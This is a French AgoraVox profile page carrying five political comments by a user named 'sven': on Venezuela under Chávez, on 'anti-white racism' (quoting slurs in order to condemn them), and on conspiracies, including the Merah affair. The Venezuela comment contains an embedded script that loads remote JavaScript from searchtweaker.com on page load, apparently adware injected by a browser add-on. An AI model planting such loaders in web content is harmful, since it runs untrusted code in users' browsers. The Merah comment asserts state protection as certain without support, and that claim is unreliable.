• AgoraVox sur Twitter
  • RSS
  • Agoravox TV Mobile

sven

Cet auteur n'a pas encore renseigné sa description

Tableau de bord

Rédaction Depuis Articles publiés Commentaires postés Commentaires reçus
L'inscription 0 9 0
1 mois 0 0 0
5 jours 0 0 0


Derniers commentaires




  • 11 votes
    sven 16 mars 2014 10:39

    Avant Chavez, le Venezuela fonctionnait autour d’un système économique éprouvé qui permettait de siphonner les revenus des pauvres vers les riches. Quand, les étudiants de gauche faisaient grève, on savait les mater : armée, arrestation et la torture infligée par des experts instruits à la School of America. Les grèves des ouvriers étaient réprimées avec énergie et maestria. En 1989 : 3000 morts d’un coup. Ca les a refroidi. Tout allait bien. Le malheur du pays a commencé avec ce Chavez, ce monstrueux dictateur élu et réélu, cet émule d’Hitler qui a inversé le système et réparti de façon plus égalitaire la manne du pétrole. Beaucoup d’argent est dépensé pour éduquer ou soigner inutilement qui ne peuvent pas payer. Pire, ils risquent de comprendre ce qui les rend pauvres ! Et puis on introduit ainsi dans le pays l’armée d’invasion de Cuba : ses médecins. Mais heureusement il reste dans le pays suffisamment de riches prêts à lutter contre l’ignoble système mis en place, ça coûte cher évidemment de payer toute cette propagande, ces journalistes, ces trucages, ces provocateurs, ces courageux mercenaires colombiens. Heureusement les USA aident à financer cette noble tâche et beaucoup d’aide vient par émulation des propagandistes des media mainstream dans le monde entier. Et c’est un investissements qui risque de rapporter gros, très gros quand on aura récupéré le pouvoir de fixer des salaires très bas et de faire crever de chômage une partie suffisante de la population.

    <script id="FoxLingoJs">(function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="//www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();</script>


  • 1 vote
    sven 13 juin 2012 12:22

    Le racisme anti-blanc ? Personnelement je n’en ai jamais été victime. Cependant, toutes les formes de "racisme" existent dans la nature : noir, arabe, jaune etc... et les femmes : "toutes des animaux aux cheveux longs et aux idées courtes" (comme l’âne de la comtesse de Ségur) ! et les français travaillant en Suisse : les "frouzes" (pour certains suisses). C’est vrai que souvent, quand j’entends mes amis blancs parler des autres, je pourrais être tenté de développer ce type de racisme tellement ils sont cons et ignorant : les bicots, les melons, les macaronis, les chinetoques, les bridés etc... Mais leur connerie m’en empêche, je ne voudrais pas leur ressembler. Je me ferais vomir. Le racisme est aussi stupide que bien partagé, et malgré cela, malgré (ou grâce) à ses liens avec bétîse et ignorance, il y en a pas mal. Raison de plus pour le combattre. Mais est-ce que vous avez remarqué la démarche de la plupart des gens qui invoquent le racisme anti-blanc : il y a d’autres idiots donc on a le droit nous aussi ! Pas une seule trace d’anti-racisme, au contraire, ils attaquent les anti-racistes. Ils revendiquent le droit d’être cons, c’est courageux ! Pour les vrais anti racistes, le racisme est indivisible. Maintenant, que que prouve cette vidéo, si tant est qu’elle prouve quelque chose, car je la trouve assez inaudible, au plus qu’il y a un con de plus au coté de madame Ségurane.



  • vote
    sven 13 juin 2012 10:39

    Je ne sais pas si le racisme anti-blanc existe, je n’en ai jamais été victime, je ne l’ai jamais observé et le moins qu’on puisse dire est que cette vidéo n’est pas concluante. J’ai déjà observé un racisme anti-français, certes. Demandez-vous ce que sont les frouzes ? Ce sont les français qui travaillent en Suisse, appelés ainsi par les racistes suisses. Combien de fois avez-vous entendu des expressions méprisantes utilisées pour désigner les arabes ou les noirs, ou les jaunes etc...Je trouve que ces discours, dans la société française, sont nombreux. Pour ma part, je me sens souvent honteux quand je me mets à la place de gens qui étalent leur stupidité contente sans complexes. Oui, la stupidité est la chose au monde la mieux partagée par les ignorants. Le racisme anti-blanc c’est surtout le fantasme de ceux qui sont incapable de lutter contre le racisme en général et préfèrent dire : "ils sont racistes, faisons de même". "C’est celui qui le dit qui, y est !". Intelligent non ?



  • 8 votes
    sven 13 juin 2012 10:19

    On a la certitude, presque depuis le début que Merah était "protégé". Voyages multiples au Moyen-orient, en Israël (ce qui représente un brevet de "bonne conduite"). Incohérences entre ses revenus et son mode de vie. Grâce à l’enquête en cours, on sait aujourd’hui qu’il avait trafiqué ses armes comme on le fait dans les services, que les fichiers de police associaient son nom avec la mention "ne pas intervenir, sécurité de l’état" ! Tout est clair. On sait aussi que la majorité des actes terroristes se font sous couverture d’un état, ne serait-ce que parce qu’il faut se procurer argent, armes, renseignements et bien sur protection. Et contrairement à ce que pensent certains, ces méthodes ne sont pas réservées aux islamistes, elles ont été employées dans la Russie tzariste, contre les mouvements de gauche, comme en Italie, dans les années 1970, pour déstabiliser un état qui voulait inclure les communistes dans le gouvernement et lutter contre la mafia. Mais jusqu’à quel point Merah a-t-il été manipulé ? Le fait qu’on nous ait menti, au lieu de reconnaître d’emblée une bavure, peut ne recouvrir que l’habitude de dissimuler ses erreurs, mais il peut aussi s’être passé quelque chose de beaucoup plus grave derrière cette affaire. Le fait qu’on l’ait abattu de cette façon grandguignolesque ajoute aux interrogations. Merah aurait manipulé les services de la DCRI ? Alors une réforme de ce service est urgents. L’acte barbare qui consiste à tuer des petits enfants de sang froid constitue, à ma connaissance, une première. je ne crois pas qu’un tel acte soit en conformité avec quelle que religion que ce soit. Merah était-il fou ? Est-ce bien Merah qui a commis la totalité de ces actes et dans quel but ? Il me semble que les citoyens français veulent et ont le droit de savoir ce qui s’est passé exactement et ne plus couvrir des opérations de manipulation telle que celle-ci !



  • 20 votes
    sven 8 avril 2012 12:32

    Bien sur, les conspirations, ça n’existe pas ! D’ailleurs, chacun sait que personne, au sein du gouvernement américain, n’a comploté pour déclencher une guerre en Irak, que rien ne justifiait. Personne n’a déclenché la guerre du Viet-Nam sur une fausse attaque d’un navire américain, dans le but d’empêcher la tenue d’élections libres. Et quand un gouvernement français, en 1973, prend une loi pour donner aux banques le monopole du prêt à l’Etat, soyons sur qu’il n’y a pas conspiration et que le Président de l’époque n’était pas un ancien employé d’une banque influente. Le complot ça n’existe pas. En nier l’existence simplifie la vie. Heureux les ignorants et les naïfs. Cessons donc de tenter de comprendre contentons nous de nier les conspirations et d’éructer des : "anti-américain", "anti-français", "bobo", islamiste, "conspirationniste" etc... Ca permet aux crétins d’accéder au dialogue intellectuel. Malheureusement, le terme anti-soviétique n’est plus très utilisé, de nos jours, mais certaines pratiques consistant à menacer de l’asile psychiatrique les contradicteurs semblent avoir largement fait école dans les esprits anti-conspiratiponnistes comme celui de monsieur Nabe. Au moins, ça permet de publier à bon compte, les éditeurs étant moins regardant sur les talents qui naviguent dans la direction que la société suggère (encore une conspiration ?). Anti-conspirationniste pourrait-il être synonyme d’arriviste ?

Les thèmes de l'auteur






Palmarès